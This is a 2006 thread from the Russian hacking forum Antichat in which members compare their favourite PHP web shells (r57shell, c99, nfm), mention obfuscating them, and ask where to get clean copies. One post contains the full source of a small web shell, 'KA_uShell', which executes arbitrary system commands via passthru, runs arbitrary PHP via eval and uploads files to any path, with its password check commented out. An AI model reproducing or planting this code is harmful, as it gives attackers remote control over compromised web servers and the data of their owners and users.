Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Опрос : Веб-Шеллы (https://forum.antichat.xyz/showthread.php?t=13607)

S-tamps 28.01.2006 02:44
Опрос : Веб-Шеллы
 
Добрый день.

Расскажите, кто какими вебшеллами пользуется, и какой на сегодня является самым функциональным и удобным?

k1b0rg 28.01.2006 02:55
r57shell 1.24 очень удобный, правда я его переделывал дописывал всякие фичи новые в него, а так имхо самый лучший.

sn0w 28.01.2006 06:14
согласен!! правда перед тем как его заюзать советую порыца в сорсе, т.к. сам замечал ссылки к примеру на каунтеры, закодированные в base64

Grrl 28.01.2006 09:14
Вставлю свое скромне имхо,
Из всех вэб-шелов могу выделить 3 наиболее удобных и функцилнальных - r57,c99,nfm private .пользуюсь чаще c99 ко всему прочему он не полохо управляется с базами данных,хотя всеже лучше для этих целей использовать rst_sql. на мой взгляд навигация удобнее всего реализованна в с99 а в r57 удобно реализованно то что уже "вшиты" бинды и баккоекты и работа с фтп.Ну а nfm хоть и пытается претеновать на роль "комбайна" явно не дотягивает там более еще и платный жаль токо бедняг кто на него потратил 50 кровныч))

D1mOn 28.01.2006 11:00
я тока r57shell, очень редко remview.

TANZWUT 28.01.2006 11:20
r57-1,24 подчищеный + прогнаный через обфускатор

Vandal 28.01.2006 12:25
юзаю r57shell ))

max_pain89 28.01.2006 19:55
юзаю r57shell с черным фоном и зелеными буквами

TTyck 28.01.2006 20:53
Только r57shell и пробовал - хватает.

gazta 30.01.2006 00:00
А какие ещё есть шеллы кроме
с99
ngh
nr
nst
php
r57
rem

я знаю только их

k1b0rg 30.01.2006 00:02
nfm .

Azazel 30.01.2006 01:01
Цитата:
Сообщение от k1b0rg
nfm .
Не знаю какой у тебя nfm, но мой если заливаешь что выдаёт ошибку парсинга. И не только у меня так вроде.

Я вот нашел недавно такой маленький.
PHP код:
<!--

/+--------------------------------+\
 |            KA_uShell           |
 |    <KAdot Universal Shell>     |
 |         Version 0.1.6          |
 |            13.03.04            |
 |  Author: KAdot <KAdot@ngs.ru>  |
 |--------------------------------|
\+                                +/

-->
<html>
<head>
<title>KA_uShell 0.1.6</title>
<style type="text/css">
<!--
body, table{font-family:Verdana; font-size:12px;}
table {background-color:#EAEAEA; border-width:0px;}
b {font-family:Arial; font-size:15px;}
a{text-decoration:none;}
-->
</style>
</head>
<body>

<?php
$self $_SERVER['PHP_SELF'];
$docr $_SERVER['DOCUMENT_ROOT'];
$sern $_SERVER['SERVER_NAME'];
$tend "</tr></form></table><br><br><br><br>";

// Configuration
$login "admin";
$pass "123";


/*/ Authentication
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="KA_uShell"');
header('HTTP/1.0 401 Unauthorized');
exit;}

else {
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
{ echo "Что надо?"; exit;}
}
*/



if (!empty($_GET['ac'])) {$ac $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac $_POST['ac'];}
else {$ac "shell";}

// Menu
echo "
|<a href=$self?ac=shell>Shell</a>|
|<a href=$self?ac=upload>File Upload</a>|
|<a href=$self?ac=tools>Tools</a>|
|<a href=$self?ac=eval>PHP Eval Code</a>|
|<a href=$self?ac=whois>Whois</a>|
<br><br><br><pre>";


switch($ac) {

// Shell
case "shell":

echo <<<HTML
<b>Shell</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
</td></tr>
<tr><td>
<textarea cols="100" rows="25">
HTML;

if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
break;


//PHP Eval Code execution
case "eval":

echo <<<HTML
<b>PHP Eval Code</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="eval">
<tr>
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
</tr>
<tr>
<td><input type="submit" value="Enter"></td>
$tend
HTML;

if (isset($_POST['ephp'])){
eval($_POST['ephp']);
}
break;


//Text tools
case "tools":

echo <<<HTML
<b>Tools</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="tools">
<tr>
<td>
<input type="radio" name="tac" value="1">B64 Decode<br>
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
<input type="radio" name="tac" value="3">md5 Hash
</td>
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" value="Enter"></td>
$tend
HTML;

if (!empty($_POST['tot']) && !empty($_POST['tac'])) {

switch($_POST['tac']) {

case "1":
echo "Раскодированный текст:<b>" .base64_decode($_POST['tot']). "</b>";
break;

case "2":
echo "Кодированный текст:<b>" .base64_encode($_POST['tot']). "</b>";
break;

case "3":
echo "Кодированный текст:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;


// Uploading
case "upload":

echo <<<HTML
<b>File Upload</b>
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td>Файло:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Папка:</td>
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Послать"></td>
$tend
HTML;

if (isset($_POST['path'])){

$uploadfile $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "Файло успешно загружен в папку $uploadfile\n";
    echo "Имя:" .$_FILES['file']['name']. "\n";
    echo "Размер:" .$_FILES['file']['size']. "\n";

} else {
    print "Не удаётся загрузить файло. Инфа:\n";
    print_r($_FILES);
}
}
break;


// Whois
case "whois":
echo <<<HTML
<b>Whois</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="whois">
<tr>
<td>Домен:</td>
<td><input size="40" type="text" name="wq"></td>
</tr>
<tr>
<td>Хуйз сервер:</td>
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
</tr>
<tr><td>
<input align="right" type="submit" value="Enter">
</td></tr>
$tend
HTML;

if (isset($_POST['wq']) && $_POST['wq']<>"") {

if (empty($_POST['wser'])) {$wser "whois.ripe.net";} else $wser $_POST['wser'];

$querty $_POST['wq']."\r\n";
$fp fsockopen($wser43);

if (!$fp) {echo "Не могу открыть сокет";} else {
fputs($fp$querty);
while(!feof($fp)){echo fgets($fp4000);}
fclose($fp);
}}
break;


}
?>
</pre>
</body>
</html>

k1b0rg 30.01.2006 01:25
ну так исправь если выдает ошибку =)))
у меня nfm 1.8 private, есть и nfm 1.7 public
честно не очень шелл, хотя возможностей до фени, почти комбайн, и весит стока же

Grrl 30.01.2006 01:47
Цитата:
Сообщение от Azazel
Не знаю какой у тебя nfm, но мой если заливаешь что выдаёт ошибку парсинга. И не только у меня так вроде.
странн.. у меня 3 приватные версии валяются 1.6 ,1.7,1.8 все нормально пашут..
а вот еще несколько бэток было так какаято помоему глючила..

Azazel 30.01.2006 03:40
У меня 1.8 Я забыл написать что он иногда ошибку выдаёт, а другой потом нормально заливается.

Tikson 30.01.2006 11:56
Цитата:
rst_sql
это ведь помоему только для работы с базой данных ?!

S-tamps 07.02.2006 10:53
Судя по отзывам - r57shell рулит.
Тогда вопрос следующий. Подскажите, где можно взять чистую версию ( без кодированых каунтеров и пр хрени )?

Rebz 07.02.2006 13:44
Ну можешь сам взять и подчистить.. а так - обращайся к Киборгу)) он недавно усовершенсвовал данный шелл)).

GreenBear 07.02.2006 13:52
Цитата:
Тогда вопрос следующий. Подскажите, где можно взять чистую версию ( без кодированых каунтеров и пр хрени )?
http://forum.antichat.ru/thread13651.html

vorishka 07.02.2006 14:56
с99 по моему лучший для лентяев =)

m0nzt3r 07.02.2006 15:17
эээ адназначна рст шелл рулит =) 1.24


Время: 20:57